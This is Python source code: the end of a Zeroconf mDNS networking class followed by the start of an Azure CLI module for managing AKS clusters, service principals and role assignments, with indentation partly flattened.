This function is threadsafe
"""
assert self.loop is not None
self.loop.call_soon_threadsafe(self.record_manager.async_remove_listener, listener)
def async_add_listener(
self, listener: RecordUpdateListener, question: Optional[Union[DNSQuestion, List[DNSQuestion]]]
) -> None:
"""Adds a listener for a given question. The listener will have
its update_record method called when information is available to
answer the question(s).
This function is not threadsafe and must be called in the eventloop.
"""
self.record_manager.async_add_listener(listener, question)
def async_remove_listener(self, listener: RecordUpdateListener) -> None:
"""Removes a listener.
This function is not threadsafe and must be called in the eventloop.
"""
self.record_manager.async_remove_listener(listener)
def handle_response(self, msg: DNSIncoming) -> None:
"""Deal with incoming response packets. All answers
are held in the cache, and listeners are notified."""
self.record_manager.async_updates_from_response(msg)
def handle_assembled_query(
self,
packets: List[DNSIncoming],
addr: str,
port: int,
transport: asyncio.DatagramTransport,
v6_flow_scope: Union[Tuple[()], Tuple[int, int]] = (),
) -> None:
"""Respond to a (re)assembled query.
        If the protocol received packets with the TC bit set, it will
wait a bit for the rest of the packets and only call
handle_assembled_query once it has a complete set of packets
or the timer expires. If the TC bit is not set, a single
packet will be in packets.
"""
now = packets[0].now
ucast_source = port != _MDNS_PORT
question_answers = self.query_handler.async_response(packets, ucast_source)
if question_answers.ucast:
questions = packets[0].questions
id_ = packets[0].id
out = construct_outgoing_unicast_answers(question_answers.ucast, ucast_source, questions, id_)
            # When sending unicast, only send back the reply
            # via the same socket that it was received from
            # as we know it's reachable from that socket
self.async_send(out, addr, port, v6_flow_scope, transport)
if question_answers.mcast_now:
self.async_send(construct_outgoing_multicast_answers(question_answers.mcast_now))
if question_answers.mcast_aggregate:
self._out_queue.async_add(now, question_answers.mcast_aggregate)
if question_answers.mcast_aggregate_last_second:
# https://datatracker.ietf.org/doc/html/rfc6762#section-14
# If we broadcast it in the last second, we have to delay
# at least a second before we send it again
self._out_delay_queue.async_add(now, question_answers.mcast_aggregate_last_second)
def send(
self,
out: DNSOutgoing,
addr: Optional[str] = None,
port: int = _MDNS_PORT,
v6_flow_scope: Union[Tuple[()], Tuple[int, int]] = (),
transport: Optional[asyncio.DatagramTransport] = None,
) -> None:
"""Sends an outgoing packet threadsafe."""
assert self.loop is not None
self.loop.call_soon_threadsafe(self.async_send, out, addr, port, v6_flow_scope, transport)
def async_send(
self,
out: DNSOutgoing,
addr: Optional[str] = None,
port: int = _MDNS_PORT,
v6_flow_scope: Union[Tuple[()], Tuple[int, int]] = (),
transport: Optional[asyncio.DatagramTransport] = None,
) -> None:
"""Sends an outgoing packet."""
if self.done:
return
# If no transport is specified, we send to all the ones
# with the same address family
transports = [transport] if transport else self.engine.senders
log_debug = log.isEnabledFor(logging.DEBUG)
for packet_num, packet in enumerate(out.packets()):
if len(packet) > _MAX_MSG_ABSOLUTE:
self.log_warning_once("Dropping %r over-sized packet (%d bytes) %r", out, len(packet), packet)
return
for send_transport in transports:
async_send_with_transport(
log_debug, send_transport, packet, packet_num, out, addr, port, v6_flow_scope
)
def _close(self) -> None:
"""Set global done and remove all service listeners."""
if self.done:
return
self.remove_all_service_listeners()
self.done = True
def _shutdown_threads(self) -> None:
"""Shutdown any threads."""
self.notify_all()
if not self._loop_thread:
return
assert self.loop is not None
shutdown_loop(self.loop)
self._loop_thread.join()
self._loop_thread = None
def close(self) -> None:
"""Ends the background threads, and prevent this instance from
servicing further queries.
This method is idempotent and irreversible.
"""
assert self.loop is not None
if self.loop.is_running():
if self.loop == get_running_loop():
log.warning(
"unregister_all_services skipped as it does blocking i/o; use AsyncZeroconf with asyncio"
)
else:
self.unregister_all_services()
self._close()
self.engine.close()
self._shutdown_threads()
async def _async_close(self) -> None:
"""Ends the background threads, and prevent this instance from
servicing further queries.
This method is idempotent and irreversible.
This call only intended to be used by AsyncZeroconf
Callers are responsible for unregistering all services
before calling this function
"""
self._close()
await self.engine._async_close() # pylint: disable=protected-access
self._shutdown_threads()
def __enter__(self) -> 'Zeroconf':
return self
def __exit__( # pylint: disable=useless-return
self,
exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType],
) -> Optional[bool]:
self.close()
return None
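# --- Editor-added illustrative sketch (not part of the original module) ---
# A minimal, hedged example of how the Zeroconf class above is typically used from
# synchronous code: build a ServiceInfo, register it, and unregister it on the way
# out. The service type, instance name, address and port are placeholder values.
def _example_register_service() -> None:  # pragma: no cover - illustrative only
    info = ServiceInfo(
        "_http._tcp.local.",
        "ExampleService._http._tcp.local.",
        addresses=[socket.inet_aton("127.0.0.1")],
        port=8080,
        properties={'path': '/example/'},
    )
    zc = Zeroconf()
    try:
        zc.register_service(info)      # announce the service with its default TTLs
    finally:
        zc.unregister_service(info)    # send goodbye packets for the service
        zc.close()                     # shut down sockets and any loop thread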
|
custom.py
|
# pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import base64
import webbrowser
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
from math import isnan
import requests
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException
import yaml # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from dateutil.parser import parse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
import colorama # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters)
from .vendored_sdks.azure_mgmt_preview_aks.v2020_09_01.models import (ContainerServiceLinuxProfile,
ManagedClusterWindowsProfile,
ContainerServiceNetworkProfile,
ManagedClusterServicePrincipalProfile,
ContainerServiceSshConfiguration,
ContainerServiceSshPublicKey,
ManagedCluster,
ManagedClusterAADProfile,
ManagedClusterAddonProfile,
ManagedClusterAgentPoolProfile,
AgentPool,
AgentPoolUpgradeSettings,
ContainerServiceStorageProfileTypes,
ManagedClusterIdentity,
ManagedClusterAPIServerAccessProfile,
ManagedClusterSKU,
ManagedClusterIdentityUserAssignedIdentitiesValue)
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import get_msi_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_storage
from ._client_factory import cf_agent_pools
from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type,
_set_outbound_type, _parse_comma_separated_list,
_trim_fqdn_name_containing_hcp)
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
from ._consts import CONST_KUBE_DASHBOARD_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_PREFIX, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
from ._consts import CONST_CONFCOM_ADDON_NAME, CONST_ACC_SGX_QUOTE_HELPER_ENABLED
from ._consts import ADDONS
logger = get_logger(__name__)
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
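# Note: which() above mirrors shutil.which(); e.g. which('kubectl') returns the
# full path of the first matching executable on PATH ('kubectl.exe' on Windows),
# or None when no match is found.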
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
    t = threading.Thread(target=wait_then_open, args=(url,))
t.daemon = True
t.start()
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
try:
create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
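# The retry pattern above (and in _delete_role_assignments below) tries the
# operation up to 10 times with a linearly growing sleep of delay + delay * x
# seconds; the for/else means False is returned only if every attempt failed.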
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
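# For example, _get_default_dns_prefix('myCluster', 'MyResourceGroup',
# '0123abcd-<rest of id>') yields 'myCluster-MyResourceGroup-0123ab': up to 10
# characters of the name, up to 16 of the resource group, and the first 6 of the
# subscription id.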
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.cli.core.profiles import ResourceType
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
validation_poller = smc.validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, deployment)
if validate:
return smc.validate(resource_group_name, deployment_name, properties)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
key_usage=key_usage, start_date=start_date, end_date=end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError('When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
    if not any([ids, assignee, role, resource_group_name, scope, yes]):
from knack.prompting import prompt_y_n
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
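# For example, _build_role_scope('my-rg', None, '<subscription id>') yields
# '/subscriptions/<subscription id>/resourceGroups/my-rg'; an explicit scope is
# returned unchanged, and supplying both a scope and a resource group raises
# a CLIError.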
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
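# Note: the GUID hard-coded in subnet_role_assignment_exists() above is the role
# definition id of the built-in "Network Contributor" role.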
def _get_user_assigned_identity_client_id(cli_ctx, resource_id):
msi_client = get_msi_client(cli_ctx)
pattern = '/subscriptions/.*?/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)'
resource_id = resource_id.lower()
match = re.search(pattern, resource_id)
if match:
resource_group_name = match.group(1)
identity_name = match.group(2)
try:
identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
resource_name=identity_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("Identity {} not found.".format(resource_id))
raise CLIError(ex.message)
return identity.client_id
raise CLIError("Cannot parse identity name from provided resource id {}.".format(resource_id))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def aks_browse(cmd, # pylint: disable=too-many-statements
client,
resource_group_name,
name,
disable_browser=False,
listen_address='127.0.0.1',
listen_port='8001'):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
# addon name is case insensitive
addon_profile = next((addon_profiles[k] for k in addon_profiles
if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
ManagedClusterAddonProfile(enabled=True))
if not addon_profile.enabled:
raise CLIError('The kube-dashboard addon was disabled for this managed cluster.\n'
'To use "az aks browse" first enable the add-on\n'
'by running "az aks enable-addons --addons kube-dashboard".')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
json={"url": dashboardURL})
logger.warning('To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
            if err.output.find(b'unknown flag: --address') != -1:
if listen_address != '127.0.0.1':
logger.warning('"--address" is only supported in kubectl v1.13 and later.')
logger.warning('The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy", "--port", listen_port])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
            requests.post('http://localhost:8888/closeport/{0}'.format(listen_port))
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
('omsagent' in result.addon_profiles) and
(hasattr(result.addon_profiles['omsagent'], 'identity')) and
(hasattr(result.addon_profiles['omsagent'].identity, 'object_id'))
):
logger.info('omsagent MSI exists, using it')
service_principal_msi_id = result.addon_profiles['omsagent'].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
else:
        logger.warning('Could not find service principal or user assigned MSI for role '
                       'assignment')
def _add_ingress_appgw_addon_role_assignment(result, cmd):
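    """Grant the cluster identity the roles the ingress-appgw addon needs: Contributor on the gateway's resource group or the node virtual network, and Network Contributor on the subnet, depending on which addon settings are present."""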
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_INGRESS_APPGW_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME], 'identity')) and
(hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity, 'object_id'))
):
service_principal_msi_id = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
config = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config
from msrestazure.tools import parse_resource_id, resource_id
if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in config:
appgw_id = config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
parsed_appgw_id = parse_resource_id(appgw_id)
appgw_group_id = resource_id(subscription=parsed_appgw_id["subscription"],
resource_group=parsed_appgw_id["resource_group"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=appgw_group_id):
logger.warning('Could not create a role assignment for application gateway: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', appgw_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_ID in config:
subnet_id = config[CONST_INGRESS_APPGW_SUBNET_ID]
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
service_principal_msi_id, is_service_principal, scope=subnet_id):
logger.warning('Could not create a role assignment for subnet: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', subnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_PREFIX in config:
if result.agent_pool_profiles[0].vnet_subnet_id is not None:
parsed_subnet_vnet_id = parse_resource_id(result.agent_pool_profiles[0].vnet_subnet_id)
vnet_id = resource_id(subscription=parsed_subnet_vnet_id["subscription"],
resource_group=parsed_subnet_vnet_id["resource_group"],
namespace="Microsoft.Network",
type="virtualNetworks",
name=parsed_subnet_vnet_id["name"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual network: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', vnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
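# Illustrative invocation of the command implemented below; the resource group and
# cluster names are placeholders:
#   az aks create -g MyResourceGroup -n MyManagedCluster --node-count 3 \
#       --enable-addons monitoring --generate-ssh-keys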
def aks_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
name,
ssh_key_value,
dns_name_prefix=None,
location=None,
